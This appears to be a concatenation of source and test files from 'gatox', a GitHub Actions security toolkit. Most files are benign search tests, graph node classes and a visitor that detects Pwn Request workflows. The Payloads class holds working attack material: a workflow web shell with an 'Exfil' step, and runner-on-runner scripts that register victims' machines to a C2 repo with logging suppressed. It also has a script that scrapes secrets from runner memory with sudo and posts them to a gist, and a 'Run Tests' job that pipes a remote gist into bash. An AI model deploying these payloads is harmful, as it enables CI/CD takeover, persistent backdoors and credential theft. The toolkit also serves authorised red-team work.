import pytest
import httpx

from unittest.mock import patch, MagicMock, AsyncMock
from gatox.github.search import Search
from gatox.search.search import Searcher
from gatox.cli.output import Output
from gatox.github.api import Api

Output(True)


@pytest.fixture(autouse=True)
def block_network_calls(monkeypatch):
    """
    Fixture to block real network calls during tests,
    raising an error if any attempt to send a request is made.
    """
    Output(True)

    def mock_request(*args, **kwargs):
        raise RuntimeError("Blocked a real network call during tests.")

    monkeypatch.setattr(httpx.Client, "send", mock_request)
    monkeypatch.setattr(httpx.AsyncClient, "send", mock_request)


@patch("gatox.github.search.asyncio.sleep")
async def test_search_api(mock_time):
    mock_client = AsyncMock()

    mock_client.call_get.side_effect = [
        MagicMock(
            status_code=200,
            json=MagicMock(
                return_value={
                    "items": [
                        {
                            "path": ".github/workflows/yaml_wf.yml",
                            "repository": {
                                "fork": False,
                                "full_name": "testOrg/testRepo",
                            },
                        }
                    ],
                    "total_count": 1,
                }
            ),
            links={},
        ),
        MagicMock(
            status_code=200,
            json=MagicMock(return_value={"items": [], "total_count": 0}),
            links={},
        ),
    ]

    searcher = Search(mock_client)

    res = await searcher.search_enumeration("testOrganization")
    assert len(res) == 1
    assert "testOrg/testRepo" in res


@patch("gatox.github.search.asyncio.sleep")
async def test_search_api_cap(mock_time, capfd):
    mock_client = AsyncMock()

    mock_client.call_get.side_effect = [
        MagicMock(
            status_code=200,
            json=MagicMock(
                return_value={
                    "items": [
                        {
                            "path": ".github/workflows/yaml_wf.yml",
                            "repository": {
                                "fork": False,
                                "full_name": "testOrg/testRepo",
                            },
                        }
                    ],
                    "total_count": 1,
                }
            ),
            links={"next": {"url": "test"}},
        ),
        MagicMock(status_code=422),
    ]

    searcher = Search(mock_client)

    res = await searcher.search_enumeration("testOrganization")
    assert len(res) == 1
    out, err = capfd.readouterr()
    assert "Search failed with response code 422" in out


@patch("gatox.github.search.asyncio.sleep")
async def test_search_api_ratelimit(mock_time, capfd):
    mock_client = AsyncMock()

    mock_client.call_get.side_effect = [
        MagicMock(
            status_code=200,
            json=MagicMock(
                return_value={
                    "items": [
                        {
                            "path": ".github/workflows/yaml_wf.yml",
                            "repository": {
                                "fork": False,
                                "full_name": "testOrg/testRepo",
                            },
                        }
                    ],
                    "total_count": 1,
                }
            ),
            links={"next": {"url": "test"}},
        ),
        MagicMock(status_code=403, text="rate limit exceeded"),
        MagicMock(
            status_code=200,
            json=MagicMock(return_value={"items": [], "total_count": 0}),
            links={},
        ),
    ]

    searcher = Search(mock_client)

    res = await searcher.search_enumeration("testOrganization")
    mock_time.assert_awaited()
    assert len(res) == 1

    out, err = capfd.readouterr()
    assert "[!] Secondary API Rate Limit Hit." in out


@patch("gatox.github.search.asyncio.sleep")
async def test_search_api_permission(mock_time, capfd):
    mock_client = AsyncMock()

    mock_client.call_get.return_value = MagicMock(
        status_code=422,
        json=MagicMock(
            return_value={
                "message": "Validation Failed",
                "errors": [
                    {
                        "message": "The listed users and repositories cannot be "
                        "searched either because the resources do not exist or you "
                        "do not have permission to view them.",
                        "resource": "Search",
                        "field": "q",
                        "code": "invalid",
                    }
                ],
                "documentation_url": "https://docs.github.com/v3/search/",
            }
        ),
    )

    searcher = Search(mock_client)

    res = await searcher.search_enumeration("privateOrg")
    assert len(res) == 0
    out, err = capfd.readouterr()
    assert "Search failed with response code 422!" in out


@patch("gatox.github.search.asyncio.sleep")
async def test_search_api_iniitalrl(mock_time, capfd):
    mock_client = AsyncMock()

    mock_client.call_get.side_effect = [
        MagicMock(
            status_code=403,
            json=MagicMock(
                return_value={
                    "documentation_url": "https://docs.github.com/en/free-pro-team@latest"
                    "/rest/overview/resources-in-the-rest-api#secondary-rate-limits",
                    "message": "You have exceeded a secondary rate limit"
                    ". Please wait a few minutes before you try again.",
                }
            ),
            text="rate limit",
        ),
        MagicMock(
            status_code=200,
            json=MagicMock(
                return_value={
                    "items": [
                        {
                            "path": ".github/workflows/yaml_wf.yml",
                            "repository": {
                                "fork": False,
                                "full_name": "testOrg/testRepo",
                            },
                        }
                    ],
                    "total_count": 1,
                }
            ),
            links={},
        ),
    ]

    searcher = Search(mock_client)

    res = await searcher.search_enumeration("testOrg")
    assert len(res) == 1
    out, err = capfd.readouterr()
    assert "[!] Secondary API Rate Limit Hit." in out


@patch("gatox.github.search.asyncio.sleep")
@patch("gatox.search.search.Api", return_value=AsyncMock(Api))
async def test_search(mock_client, mock_time):
    mock_client.return_value.transport = None

    mock_client.return_value.call_get.return_value = MagicMock(
        status_code=200,
        json=MagicMock(
            return_value={
                "items": [
                    {"repository": {"full_name": "candidate1"}},
                    {"repository": {"full_name": "candidate2"}},
                ],
                "total_count": 2,
            }
        ),
        links={},
    )

    gh_search_runner = Searcher("ghp_AAAA")
    res = await gh_search_runner.use_search_api("targetOrg")
    assert res is not False


@patch("gatox.github.search.asyncio.sleep")
@patch("gatox.search.search.Api", return_value=AsyncMock(Api))
async def test_search_query(mock_client, mock_time, capfd):

    mock_client.return_value.transport = None
    mock_client.return_value.call_get.return_value = MagicMock(
        status_code=200,
        json=MagicMock(
            return_value={
                "items": [
                    {"repository": {"full_name": "candidate1"}},
                    {"repository": {"full_name": "candidate2"}},
                ]
            }
        ),
        links={},
    )

    gh_search_runner = Searcher("ghp_AAAA")

    res = await gh_search_runner.use_search_api(
        None, query="pull_request_target self-hosted"
    )
    out, err = capfd.readouterr()
    assert "GitHub with the following query: pull_request_target self-hosted" in out


@patch("gatox.github.search.asyncio.sleep")
@patch("gatox.search.search.Api", return_value=AsyncMock(Api))
async def test_search_bad_token(mock_client, mock_time):
    mock_client.return_value.transport = None
    mock_client.return_value.call_get.return_value = MagicMock(
        status_code=401,
        json=MagicMock(
            return_value={
                "message": "Validation Failed",
                "errors": [
                    {
                        "message": "The listed users and repositories cannot be "
                        "searched either because the resources do not exist or you "
                        "do not have permission to view them.",
                        "resource": "Search",
                        "field": "q",
                        "code": "invalid",
                    }
                ],
                "documentation_url": "https://docs.github.com/v3/search/",
            }
        ),
    )

    gh_search_runner = Searcher("ghp_AAAA")
    res = await gh_search_runner.use_search_api("targetOrg")

    assert res == []



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""


class Node:
    """
    A base class representing a generic node with a name.

    Attributes:
        name (str): The name of the node.
    """

    def __init__(self, name):
        """
        Initialize a Node instance.

        Args:
            name (str): The name of the node.
        """
        self.name = name

    def __repr__(self):
        """
        Return a string representation of the Node instance.

        Returns:
            str: A string representation of the Node instance.
        """
        return f"{self.__class__.__name__}('{self.name}')"

    def __hash__(self):
        """
        Return the hash value of the Node instance.

        Returns:
            int: The hash value of the Node instance.
        """
        return hash((self.name, self.__class__.__name__))

    def __eq__(self, other):
        """
        Check if two Node instances are equal.

        Args:
            other (Node): Another Node instance to compare with.

        Returns:
            bool: True if the instances are equal, False otherwise.
        """
        return isinstance(other, self.__class__) and self.name == other.name

    def get_if(self):
        return ""

    def get_needs(self):
        """
        Get the needs associated with the Node instance.

        Returns:
            list: An empty list.
        """
        return []

    def get_repr(self):
        """
        Get the representation of the Node instance.

        Returns:
            value: A dict representation of the Node instance.
        """
        value = {
            "node": str(self),
        }
        return value

    def get_tags(self):
        """
        Get the tags associated with the Node instance.

        Returns:
            set: A set containing the class name of the Node instance.
        """
        tags = set([self.__class__.__name__])
        return tags



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import logging

from gatox.caching.cache_manager import CacheManager
from gatox.workflow_graph.graph.tagged_graph import TaggedGraph

logger = logging.getLogger(__name__)


class RunnerVisitor:
    """Simple visitor that extracts nodes that are tagged to potentially
    run on self-hosted runners.
    """

    @staticmethod
    async def find_runner_workflows(graph: TaggedGraph):
        """Graph visitor to find workflows that are likely
        to use self-hosted runners.
        """
        nodes = graph.get_nodes_for_tags(["self-hosted"])
        workflows = {}
        for node in nodes:
            try:
                repo = node.repo_name()

                if "workflow_call" in node.get_workflow().get_tags():
                    # We need to find the parent workflow.
                    callers = node.get_workflow().get_caller_workflows()
                    for caller in callers:
                        workflows.setdefault(repo, set()).add(
                            caller.get_workflow_name()
                        )

                cached_repo = CacheManager().get_repository(repo)
                if cached_repo:
                    cached_repo.add_self_hosted_workflows([node.get_workflow_name()])

                workflows.setdefault(repo, set()).add(node.get_workflow_name())
            except Exception as e:
                logger.warning(f"Error processing node: {node.name}")
                logger.warning(e)

        return workflows



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import logging

from gatox.enumerate.results.confidence import Confidence
from gatox.enumerate.results.complexity import Complexity
from gatox.enumerate.results.issue_type import IssueType
from gatox.workflow_graph.graph.tagged_graph import TaggedGraph
from gatox.workflow_graph.visitors.visitor_utils import VisitorUtils
from gatox.github.api import Api
from gatox.workflow_parser.utility import CONTEXT_REGEX
from gatox.caching.cache_manager import CacheManager

logger = logging.getLogger(__name__)


class PwnRequestVisitor:
    """Visits the graph to find potential Pwn Requests."""

    @staticmethod
    async def _process_single_path(path, graph, api, rule_cache, results):
        """
        Process a single path for potential security issues.
        This method analyzes a given path within the workflow graph to identify and flag
        potential security vulnerabilities related to Pwn (Privilege Escalation) requests.
        It inspects each node for specific tags, evaluates deployment environment rules,
        and determines if approval gates are required based on the analysis.
        Args:
            path (List[Node]):
                The sequence of nodes representing a potential security path to process.
            graph (TaggedGraph):
                The workflow graph containing all nodes and their relationships.
            api (Api):
                An instance of the API wrapper to interact with external services.
            rule_cache (dict):
                A cache storing environment protection rules for repositories to avoid redundant API calls.
            results (dict):
                A dictionary aggregating the detected security issues, organized by repository.
        Returns:
            None
        Raises:
            None
        """
        input_lookup = {}
        env_lookup = {}
        flexible_lookup = {}
        approval_gate = False

        for index, node in enumerate(path):
            tags = node.get_tags()

            if "JobNode" in tags:
                # Check deployment environment rules
                if node.deployments:
                    if node.repo_name() in rule_cache:
                        rules = rule_cache[node.repo_name()]
                    else:
                        rules = await api.get_all_environment_protection_rules(
                            node.repo_name()
                        )
                        rule_cache[node.repo_name()] = rules
                    for deployment in node.deployments:
                        if isinstance(deployment, dict):
                            deployment = deployment["name"]
                        deployment = VisitorUtils.process_context_var(deployment)

                        if deployment in input_lookup:
                            deployment = input_lookup[deployment]
                        elif deployment in env_lookup:
                            deployment = env_lookup[deployment]

                        if deployment in rules:
                            approval_gate = True
                            continue

                paths = await graph.dfs_to_tag(node, "permission_blocker", api)
                if paths:
                    break

                paths = await graph.dfs_to_tag(node, "permission_check", api)
                if paths:
                    approval_gate = True

                if node.outputs:
                    for o_key, val in node.outputs.items():
                        if not isinstance(val, str):
                            continue

                        if "env." in val and val not in env_lookup:
                            for key in env_lookup.keys():
                                if key in val:
                                    flexible_lookup[o_key] = env_lookup[key]

            elif "StepNode" in tags:
                if node.is_checkout:
                    # Terminal
                    checkout_ref = node.metadata
                    if "inputs." in node.metadata:
                        processed_var = VisitorUtils.process_context_var(node.metadata)
                        if processed_var in env_lookup:
                            original_val = env_lookup[processed_var]
                            checkout_ref = original_val
                        elif processed_var in input_lookup:
                            checkout_ref = input_lookup[processed_var]

                    elif "env." in node.metadata:
                        for key, val in env_lookup.items():
                            if key in node.metadata:
                                checkout_ref = val
                                break

                    if (
                        approval_gate
                        and VisitorUtils.check_mutable_ref(
                            checkout_ref, path[0].get_tags()
                        )
                    ) or not approval_gate:
                        sinks = await graph.dfs_to_tag(node, "sink", api)

                        if approval_gate:
                            complexity = Complexity.TOCTOU
                        elif "workflow_run" in path[0].get_tags():
                            complexity = Complexity.PREVIOUS_CONTRIBUTOR
                        else:
                            complexity = Complexity.ZERO_CLICK

                        complexity = Complexity.TOCTOU if approval_gate else complexity
                        if sinks:
                            VisitorUtils.append_path(path, sinks[0])
                            confidence = Confidence.HIGH
                        else:
                            confidence = Confidence.UNKNOWN

                        VisitorUtils._add_results(
                            path,
                            results,
                            IssueType.PWN_REQUEST,
                            complexity=complexity,
                            confidence=confidence,
                        )
                        break

                if node.outputs:
                    for key, val in node.outputs.items():
                        if "env." in val:
                            pass

                if node.hard_gate:
                    break

                if node.soft_gate:
                    approval_gate = True

            elif "WorkflowNode" in tags:
                if index != 0 and "JobNode" in path[index - 1].get_tags():
                    # Caller job node
                    node_params = path[index - 1].params
                    # Set lookup for input params
                    input_lookup.update(node_params)
                if index == 0:
                    repo = CacheManager().get_repository(node.repo_name())
                    if repo.is_fork():
                        break

                    if node.excluded():
                        break

                    if "pull_request_target:labeled" in tags:
                        approval_gate = True

                    # Check workflow environment variables
                    env_vars = node.get_env_vars()
                    for key, val in env_vars.items():
                        if isinstance(val, str) and "github." in val:
                            env_lookup[key] = val

            elif "ActionNode" in tags:
                await VisitorUtils.initialize_action_node(graph, api, node)

    @staticmethod
    async def find_pwn_requests(
        graph: TaggedGraph, api: Api, ignore_workflow_run=False
    ):
        """
        Identify and process potential Pwn Requests within the workflow graph.

        This method searches for paths within the workflow graph that could lead to
        privilege escalation vulnerabilities. It starts by querying nodes with specific
        tags related to pull requests and issues, then performs depth-first searches to
        locate checkout nodes, and processes each discovered path for potential security issues.

        Args:
            graph (TaggedGraph):
                The workflow graph containing all nodes and their relationships.
            api (Api):
                An instance of the API wrapper to interact with GitHub APIs.
            ignore_workflow_run (bool, optional):
                Determines whether to ignore nodes tagged with "workflow_run". Defaults to False.

        Returns:
            dict: Results containing any identified security issues organized by repository.

        Raises:
            None
        """
        query_taglist = [
            "issue_comment",
            "pull_request_target",
            "pull_request_target:labeled",
        ]

        if not ignore_workflow_run:
            query_taglist.append("workflow_run")

        # Retrieve all repository-related nodes with the specified tags
        nodes = graph.get_nodes_for_tags(query_taglist)
        all_paths = []
        results = {}
        rule_cache = {}

        for cn in nodes:
            try:
                paths = await graph.dfs_to_tag(cn, "checkout", api)
                if paths:
                    all_paths.append(paths)
            except Exception as e:
                logger.error(f"Error finding paths for pwn request node: {e}")
                logger.error(f"Node: {cn}")

        for path_set in all_paths:
            for path in path_set:
                try:
                    await PwnRequestVisitor._process_single_path(
                        path, graph, api, rule_cache, results
                    )
                except Exception as e:
                    logger.warning(f"Error processing path: {e}")
                    logger.warning(f"Path: {path}")

        return results



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import asyncio
from gatox.models.repository import Repository
from gatox.workflow_graph.graph_builder import WorkflowGraphBuilder
from gatox.git.git import Git


class IngestNonDefault:
    """Class to handle ingesting non-default branches asynchronously."""

    _tasks = []
    _api = None

    @classmethod
    async def ingest(cls, repo: Repository, api):
        """
        Enqueue a repository ingest task.
        If the API hasn't been initialized, initialize it.
        """
        if cls._api is None:
            cls._api = api

        # Create and store the task
        task = asyncio.create_task(cls._process_repo(repo))
        cls._tasks.append(task)
        return task

    @classmethod
    async def _process_repo(cls, repo: Repository):
        """Actual processing of a repository's non-default workflows."""
        git_client = Git(cls._api.pat, repo.name)
        workflows = await git_client.get_non_default()
        for workflow in workflows:
            await WorkflowGraphBuilder().build_graph_from_yaml(workflow, repo)

    @classmethod
    async def pool_empty(cls):
        """
        Returns a Future that completes once all currently-enqueued tasks finish.
        """
        if not cls._tasks:
            # No work was ever queued
            return None

        # Wait for all tasks to complete
        await asyncio.gather(*cls._tasks, return_exceptions=True)
        cls._tasks = []  # Clear the tasks list
        return None



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from gatox.workflow_graph.nodes.node import Node
from gatox.models.repository import Repository


class RepoNode(Node):
    """
    Wrapper class for a GitHub repository.

    Attributes:
        name (str): A unique identifier for the repository node.
    """

    def __init__(self, repo_wrapper: Repository):
        """
        Constructor for the repository wrapper.

        Args:
            repo_wrapper (Repository): The repository object to wrap.
        """
        # Create a unique ID for this repository.
        self.name = f"{repo_wrapper.name}"

    def __hash__(self):
        """
        Return the hash value of the RepoNode instance.

        Returns:
            int: The hash value of the RepoNode instance.
        """
        return hash((self.name, self.__class__.__name__))

    def __eq__(self, other):
        """
        Check if two RepoNode instances are equal.

        Args:
            other (RepoNode): Another RepoNode instance to compare with.

        Returns:
            bool: True if the instances are equal, False otherwise.
        """
        return isinstance(other, self.__class__) and self.name == other.name

    def get_tags(self):
        """
        Get the tags associated with the RepoNode instance.

        Returns:
            set: A set containing the class name of the RepoNode instance.
        """
        tags = set([self.__class__.__name__])
        return tags

    def get_attrs(self):
        """
        Retrieve attributes associated with the RepoNode instance.

        Returns:
            dict: A dictionary containing attributes of the RepoNode instance.
        """
        return {
            self.__class__.__name__: True,
        }



import pytest
from gatox.workflow_graph.nodes.action import ActionNode


def test_init_basic():
    """Test basic initialization of ActionNode"""
    node = ActionNode(
        action_name="actions/checkout@v2",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    assert node.name == "test/repo:main:.:actions/checkout@v2"
    assert not node.is_sink
    assert not node.is_checkout
    assert node.if_condition == ""
    assert not node.is_gate
    assert not node.hard_gate
    assert not node.metadata
    assert node.initialized
    assert node.caller_ref == "main"
    assert node.type == "UNK"


def test_init_known_gate():
    """Test initialization with known gate action"""
    node = ActionNode(
        action_name="actions-cool/check-user-permission@v1",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    assert node.is_gate
    assert not node.hard_gate
    assert node.initialized


def test_init_known_hard_gate():
    """Test initialization with known hard gate action"""
    node = ActionNode(
        action_name="dependabot/fetch-metadata@v1",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    assert node.is_gate
    assert node.hard_gate
    assert node.initialized


def test_init_known_good():
    """Test initialization with known good action"""
    node = ActionNode(
        action_name="azure/login@v1",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    assert node.initialized


def test_init_docker():
    """Test initialization with docker action"""
    node = ActionNode(
        action_name="docker://alpine:latest",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    assert node.initialized


def test_hash():
    """Test hash functionality"""
    node1 = ActionNode(
        action_name="actions/checkout@v2",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )
    node2 = ActionNode(
        action_name="actions/checkout@v2",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    assert hash(node1) == hash(node2)


def test_eq():
    """Test equality comparison"""
    node1 = ActionNode(
        action_name="actions/checkout@v2",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )
    node2 = ActionNode(
        action_name="actions/checkout@v2",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    assert node1 == node2


def test_get_tags():
    """Test getting tags"""
    node = ActionNode(
        action_name="actions/checkout@v2",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )
    node.is_checkout = True
    node.is_sink = True
    node.initialized = False
    node.is_gate = True

    tags = node.get_tags()
    assert "ActionNode" in tags
    assert "checkout" in tags
    assert "sink" in tags
    assert "uninitialized" in tags
    assert "permission_check" in tags


def test_get_attrs():
    """Test getting attributes"""
    node = ActionNode(
        action_name="actions/checkout@v2",
        ref="main",
        action_path=".",
        repo_name="test/repo",
        params={},
    )

    attrs = node.get_attrs()
    assert attrs["ActionNode"] is True
    assert attrs["type"] == "UNK"
    assert attrs["is_soft_gate"] is False
    assert attrs["is_hard_gate"] is False



import yaml


class Payloads:
    """Collection of payload template used for various attacks."""

    ROR_SHELL = b"""
name: Web Shell
run-name: Shell - ${{ inputs.runner }} - ${{ inputs.cmd || inputs.download_file }}

on:
  workflow_dispatch:
    inputs:
      cmd:
        description: "Command"
        required: false
        type: string
      runner:
        description: "Runner"
        required: true
        type: string
      download_file:
        description: "Download a file instead of running a command."
        required: false
        type: string

jobs:
  build:
    runs-on: ${{ inputs.runner }}
    # We don't specify a shell type here, because it will use the default shell of the underlying OS.
    steps:
      - name: Run
        if: ${{ !inputs.download_file }}
        env:
          RUNNER_TRACKING_ID: 0
        run: ${{ inputs.cmd }}
        continue-on-error: true
      - name: Exfil
        if: ${{ inputs.download_file }}
        continue-on-error: true
        uses: actions/upload-artifact@v4
        with:
          path: ${{ inputs.download_file }}
          name: result
"""

    # Need to make sure we get the OS, Arch, Version right.
    ROR_GIST = """
REG_TOKEN=`echo "{0}" | base64 -d`
C2_REPO={1}
KEEP_ALIVE={4}
export WORKER_LOGRETENTION=1
export RUNNER_LOGRETENTION=1
mkdir -p $HOME/.actions-runner1/ && cd $HOME/.actions-runner1/
curl -o {2} -L https://github.com/actions/runner/releases/download/{3}/{2} > /dev/null 2>&1
tar xzf ./{2}
export RUNNER_ALLOW_RUNASROOT="1"
./config.sh --url https://github.com/$C2_REPO --unattended --token $REG_TOKEN --name "gatox-{5}" --labels "gatox-{5}" > /dev/null 2>&1
rm {2}

if [ "$KEEP_ALIVE" = true ]; then
    export RUNNER_TRACKING_ID=0 && ./run.sh > /dev/null 2>&1
else
    export RUNNER_TRACKING_ID=0 && nohup ./run.sh > /dev/null 2>&1 &
fi
"""

    ROR_GIST_WINDOWS = """
$keep_alive = ${4}
$env:RUNNER_LOGRETENTION=1
$env:WORKER_LOGRETENTION=1
mkdir C:\\.actions-runner1; cd C:\\.actions-runner1
Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/{3}/{2} -OutFile {2}
Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory("$PWD/{2}", "$PWD")
./config.cmd --url https://github.com/{1} --unattended --token {0} --name "gatox-{5}" --labels "gatox-{5}"
$env:RUNNER_TRACKING_ID=0

if ($keep_alive) {{ ./run.cmd }} else {{ Start-Process -WindowStyle Hidden -FilePath "./run.cmd" }}
"""

    ROR_GIST_MACOS = """
REG_TOKEN=`echo "{0}" | base64 -d`
C2_REPO={1}
KEEP_ALIVE={4}

export WORKER_LOGRETENTION=1
export RUNNER_LOGRETENTION=1
mkdir -p $HOME/runner/.actions-runner/ && cd $HOME/runner/.actions-runner/
curl -o {2} -L https://github.com/actions/runner/releases/download/{3}/{2} > /dev/null 2>&1
tar xzf ./{2}
./config.sh --url https://github.com/$C2_REPO --unattended --token $REG_TOKEN --name "gatox-{5}" --labels "gatox-{5}" > /dev/null 2>&1
rm {2}

if [ "$KEEP_ALIVE" = true ]; then
    export RUNNER_TRACKING_ID=0 && ./run.sh > /dev/null 2>&1
else
    export RUNNER_TRACKING_ID=0 && nohup ./run.sh > /dev/null 2>&1 &
fi
"""

    @staticmethod
    def create_exfil_payload():
        """Creates a Gist hosting an exfiltration payload."""

        payload = """
if [[ "$OSTYPE" == "linux-gnu" ]]; then
  ENCODED_MEMDUMP="{}"
  B64_BLOB=`base64 -d $ENCODED_MEMDUMP | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\\{"value":"[^"]*","isSecret":true\\}' | sort -u | base64 -w 0`
  GIST_TOKEN="{}"
  GIST_TOKEN_DECODED=`echo $GIST_TOKEN | base64 -d`

  curl -L \
    -X POST \
    -H "Accept: application/vnd.github+json" \
    -H "Authorization: Bearer $GIST_TOKEN_DECODED" \
    -H "X-GitHub-Api-Version: 2022-11-28" \
    https://api.github.com/gists -d '{"public":false,"files":{"Exfil":{"content":"'$B64_BLOB'"}}}' > /dev/null

    sleep 900
else
  exit 0
fi
"""

    @staticmethod
    def create_ror_workflow(
        workflow_name: str,
        run_name: str,
        gist_url: str,
        runner_labels: list,
        target_os: str = "linux",
    ):
        """ """
        yaml_file = {}

        yaml_file["name"] = workflow_name
        yaml_file["run-name"] = run_name if run_name else workflow_name
        yaml_file["on"] = ["pull_request"]

        if target_os == "linux" or target_os == "osx":
            run_payload = f"curl -sSfL {gist_url} | bash > /dev/null 2>&1"
        elif target_os == "win":
            run_payload = f"curl -sSfL {gist_url} | powershell *> $null"

        test_job = {
            "runs-on": runner_labels,
            "steps": [
                {
                    "name": "Run Tests",
                    "run": run_payload,
                    "continue-on-error": "true",
                }
            ],
        }
        yaml_file["jobs"] = {"testing": test_job}

        return yaml.dump(yaml_file, sort_keys=False, default_style="", width=4096)



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

from gatox.workflow_graph.nodes.node import Node

from gatox.workflow_parser.utility import decompose_action_ref, starts_with_any


class ActionNode(Node):
    """
    Wrapper class for a GitHub Actions workflow action.

    Attributes:
        name (str): A unique identifier for the action node.
        params (dict): Parameters associated with the action node.
        is_sink (bool): Indicates if the action is a sink.
        is_checkout (bool): Indicates if the action is a checkout.
        if_condition (str): The condition under which the action runs.
        is_gate (bool): Indicates if the action is a gate.
        metadata (bool): Metadata associated with the action.
        initialized (bool): Indicates if the action is initialized.
        type (str): The type of the action.
    """

    # Set of actions that we do not need
    # to pull down yamls for.
    KNOWN_GOOD = set(
        [
            "azure/login",
            "github/codeql-action/analyze",
            "docker/login-action",
            "github/codeql-action",
            "github/codeql-action/init",
            "codecov/codecov-action",
            "docker/setup-buildx-action",
            "actions-cool/check-user-permission",
        ]
    )

    KNOWN_SINKS = set(
        [
            "sonarsource/sonarcloud-github-action",
            "actions/jekyll-build-pages",
            "bridgecrewio/checkov-action",
            "pre-commit/action",
            "oxsecurity/megalinter",
            "andresz1/size-limit-action",
        ]
    )

    ARTIFACT_RETRIEVERS = set(
        [
            "actions/download-artifact",
        ]
    )

    KNOWN_GATES = set(
        [
            "sushichop/action-repository-permission",
            "actions-cool/check-user-permission",
            "shopify/snapit",
            "peter-evans/slash-command-dispatch",
            "TheModdingInquisition/actions-team-membership",
            "prince-chrismc/check-actor-permissions-action",
            "lannonbr/repo-permission-check-action",
            "skjnldsv/check-actor-permission",
        ]
    )

    GOOD_PREFIXES = set(
        [
            "actions/",
            "docker/",
            "octokit/",
            "github/",
        ]
    )

    KNOWN_HARD_GATES = set(["dependabot/fetch-metadata"])

    def __init__(
        self, action_name: str, ref: str, action_path: str, repo_name: str, params: dict
    ):
        """
        Constructor for the action wrapper.

        Args:
            action_name (str): The name of the action.
            ref (str): The reference (e.g., branch or tag).
            action_path (str): The path to the action file.
            repo_name (str): The name of the repository.
            params (dict): Parameters associated with the action.
        """
        # Create a unique ID for this action.
        self.name = f"{repo_name}:{ref}:{action_path}:{action_name}"
        self.is_sink = False
        self.is_checkout = False
        self.if_condition = ""
        self.is_gate = False
        self.hard_gate = False
        self.metadata = False
        self.initialized = False
        self.caller_ref = ref
        self.type = "UNK"

        self.action_info = decompose_action_ref(action_name, repo_name)

        if not self.action_info["local"]:
            if "@" in self.action_info["key"]:
                initial_path = self.action_info["key"].split("@")[0]
            else:
                initial_path = self.action_info["key"]
            # We only check actions if they belong to another
            # repo in the same org. This is because most 3P actions
            # will use node. We are interested in organizations that
            # use a centralized repo with reusable composite actions to prevent
            # duplication.
            if not self.action_info["key"].startswith(repo_name.split("/")[0]):
                self.initialized = True
            # We don't need to download official GitHub Actions.
            if starts_with_any(self.action_info["key"], self.GOOD_PREFIXES):
                self.initialized = True
            if initial_path in self.KNOWN_GOOD:
                self.initialized = True
            if initial_path in self.KNOWN_GATES:
                self.is_gate = True
            if initial_path in self.KNOWN_HARD_GATES:
                self.is_gate = True
                self.hard_gate = True
            if initial_path in self.KNOWN_SINKS:
                self.is_sink = True
        elif self.action_info["docker"]:
            # We don't resolve docker actions
            self.initialized = True

    def __hash__(self):
        """
        Return the hash value of the ActionNode instance.

        Returns:
            int: The hash value of the ActionNode instance.
        """
        return hash((self.name, self.__class__.__name__))

    def __eq__(self, other):
        """
        Check if two ActionNode instances are equal.

        Args:
            other (ActionNode): Another ActionNode instance to compare with.

        Returns:
            bool: True if the instances are equal, False otherwise.
        """
        return isinstance(other, self.__class__) and self.name == other.name

    def get_step_data(self):
        """ """
        return self.action_info["key"]

    def get_tags(self):
        """
        Get the tags associated with the ActionNode instance.

        Returns:
            set: A set containing the class name of the ActionNode instance.
        """
        tags = set([self.__class__.__name__])

        if self.is_checkout:
            tags.add("checkout")

        if self.is_sink:
            tags.add("sink")

        if not self.initialized:
            tags.add("uninitialized")

        if self.is_gate:
            tags.add("permission_check")

        return tags
